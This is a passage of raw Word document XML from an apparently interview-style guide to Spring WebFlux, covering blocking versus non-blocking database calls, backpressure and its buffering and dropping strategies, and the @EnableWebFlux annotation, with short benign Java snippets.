          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Can you give an example of a blocking operation in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="515"/>
    </w:p>
    <w:p w14:paraId="22F0764E" w14:textId="3A2FCA8E" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019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a blocking operation in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C12D6F"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Blocking Database Call in WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F8BC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se you have a database query tha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Here's how it might look:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61E89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3256CEF"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1DD0D283" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019AF" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F289C3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FDE5C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A blocking repository method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E644660" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019AF" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27ECB73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3F3E0A8E"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User getUser(@RequestParam String userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A27C54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blocking operation (e.g., fetching from a relational DB with JDBC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C8DB0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blocking call!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E87CDB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AEC09F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C467DA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e above example, userRepository.findById() is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because it waits for the database to return the result before moving forward.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while this operation is executing, the thread is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and cannot be used to process any other incoming requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274F495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This a Problem in Spring WebFlux?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BE122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he goal is to free up threads during the waiting period. So,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perations go against this goal and degrade the performance benefits of WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B49AB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olution: Make It Non-Blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A0F118"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avoid this issue, you can us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database calls, like those provided by </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Repositorie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Data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or other reactive databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634DF48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instan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xml:space="preserve"> for a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking database call</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AB55A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800F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2865E397" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019AF" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D8D03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B82526"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Non-blocking repository method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A75D681" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019AF" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B2F9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5E18311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User&gt; getUser(@RequestParam String userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611F9B9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non-blocking call (e.g., using R2DBC or reactive MongoDB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1BD9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non-blocking call!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF2FE6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15B5B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EA001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is updated code, userRepository.findById() returns a Mono&lt;User&gt;, and the operation i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The thread is not blocked while waiting for the database query to finish, and it can be used for other tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F11F91A"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F8E1B42" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00CE4B95" w:rsidRDefault="002019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blocking operations (like traditional JDBC database calls or blocking HTTP requests) can severely limit the scalability of your application. Instead, you should use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and reactive libraries (lik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to fully leverage the non-blocking architecture of WebFlux and avoid blocking threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168A30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89" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3643C12D" w14:textId="15A5BCB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6" w:name="_Toc197867730"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Spring WebFlux handle backpressure</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="516"/>
    </w:p>
    <w:p w14:paraId="3A4F7D72" w14:textId="328CE01A" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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handle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through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is an integral part of the framework's design.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occurs when a system or component producing data is faster than the system or component consuming the data, causing the consumer to become overwhelmed and potentially </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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Backpressure in Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ACAC9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define a standard for asynchronous stream process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This specification includes four key interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B65DF6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The producer of data, such as a stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E37E48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The consumer of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314804A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ption</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A connection between the publisher and the subscriber.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E6AE0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cessor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A combination of both publisher and subscriber.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AEB04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these components to control how data flows between producers and consumers, ensuring that backpressure is properly managed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ACC7E5"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Spring WebFlux Handles Backpressure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7D4F9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ow Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6344EC"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 Subscriber requests data from the Publisher using the request(n) method, where n is the number of items it is willing to consume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8211BD"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 subscriber is not ready to handle more items, it can request fewer items or temporarily stop consuming, allowing the system to adapt and prevent overloading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEF4EE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 Mono and Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B4076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re the building blocks of reactive programming in Spring WebFlux, representing single (Mono) or multiple (Flux) asynchronous values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8CFFD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is particularly useful for handling a stream of items. It provides mechanisms for controlling how many items are emitted by the publisher at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E40AE6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026EAB1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6AA546E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Buffer(100, (buffered, dropped) -&gt; System.out.println("Dropped: " + dropped));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619DC75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7CF520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trategies</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring WebFlux provides several strategies to handle backpressure, which allows developers to control how the system reacts when the consumer can’t keep up with the publisher:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141212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the incoming data until the consumer is ready. It ensures that the items aren’t lost, but may cause memory consumption to increase if the buffer grows too large.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14624E43"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the excess data when the consumer is overwhelmed, making it useful for scenarios where losing data is acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A611FA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Only allows the most recent data to be processed and drops any intermediate items. It ensures that only the latest data is processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B083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2512C3B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5BEA66B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Drop();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A737FA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF414B6"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also offers a set of operators that can be used to control backpressure behavior in different ways. Some of these operators help with throttling or merging the data streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB600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delayElements to throttle data production:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E31066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9CF671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s(Duration.ofMillis(100));  // Delay each item by 100ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B20C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0D99915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 Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5768741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895615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new Subscriber&lt;Integer&gt;() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C32C5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rivate Subscription subscription;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B886C6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B4909A"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491C393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Subscribe(Subscription subscription) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACBC19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subscription = subscription;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CE395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ption.request(10);  // Requesting only 10 items initially</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637B5C2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E8B4D4A" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A6176" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1120D2C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343977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Next(Integer integer) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431611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integer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD7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9B1ED2" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A6176" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EFA37E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503F7C0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Error(Throwable throwable) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E86BE1D" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A6176" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02382BA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FEEE28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Complete() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A755ED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3C42A0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the subscriber requests only 10 items at a time, and the publisher will only send data in batches of 10 items, respecting the backpressure mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678C68A3"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10973439"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backpressure is handled efficiently by using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allows for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous, non-blocking data processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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90" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EB31F3" w14:textId="3C32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7" w:name="_Toc197867731"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is backpressure and why is it important</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="517"/>
    </w:p>
    <w:p w14:paraId="1CC3B4CE" w14:textId="4DDDD7EF" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Backpressure Important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A6DC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event System Overload</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A388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out backpressure, if the producer generates data faster than the consumer can process it, the system can run out of memory or other resources, resulting in poor performance or crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C4CC5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Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDFD63B"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helps manage system resources effectively by controlling the rate of data flow, preventing excessive memory usage and CPU load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622A913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 Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1611C785"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data is processed in a controlled way. If backpressure isn’t handled properly, important data might get lost or discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431FF94E"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intain System Stability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAC03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using backpressure mechanisms like buffering, dropping, or slowing down the flow of data, systems can remain stable even when the rate of incoming data exceeds the processing speed of the consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B6B0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE4C56D"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cenarios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7EE67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treaming APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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base Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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ackpressure Handling Strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF80BC"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ffering</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Data is temporarily stored in a buffer until the consumer can process it. This allows the system to continue receiving data without dropping it but requires additional memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EA8DE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ropping</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the system can’t keep up, excess data is discarded. This is often used when it’s acceptable to lose some data, such as in certain event-driven systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B53B0F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atest Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When backpressure occurs, only the latest data is kept, and older data is discarded. This ensures that only the most recent updates are processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B7B9FC"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Backpressure in Reactive Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3766C75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backpressure is typically handled using a framework lik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For example, a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stream may be configured to handle backpressure in various ways using operators like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB64A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data until the consumer is ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535105A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data when the consumer can't keep up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6653A1E0"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Keeps only the latest data and drops intermediate data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3175FB06"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6FED47A" w14:textId="3B077AA2" w:rsidR="00163F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="0083373B"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291" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="528E8A38" w14:textId="7012839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8" w:name="_Toc197867732"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the @EnableWebFlux annotation used for</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="518"/>
    </w:p>
    <w:p w14:paraId="65E17846" w14:textId="70BFD3AD"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EnableWebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C4689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s Spring WebFlux Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ED92D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ctivates the reactive web support in the Spring application, allowing the use of reactive controllers, routers, and other WebFlux components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10282D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 and Reactive Endpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7077EBA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EnableWebFlux is applied, the application is capable of handling non-blocking I/O operations, making it suitable for building reactive web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4397D20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s the WebFlux Context</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32618CF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d for Router and Handler Function Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F124A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re using Spring WebFlux with router functions (using a functional approach rather than controllers), @EnableWebFlux is required to set up the appropriate context for routing and handler functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2518F823"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9F410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3334C01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EnableWebFlux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BA20B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WebFluxConfigurer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44864867" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="00281739" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E94602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4D3A602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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5386E4C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onfig implements WebFluxConfigurer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903536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itional WebFlux configuration can be added here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA3573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565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EnableWebFlux:</w:t>
      </w:r>
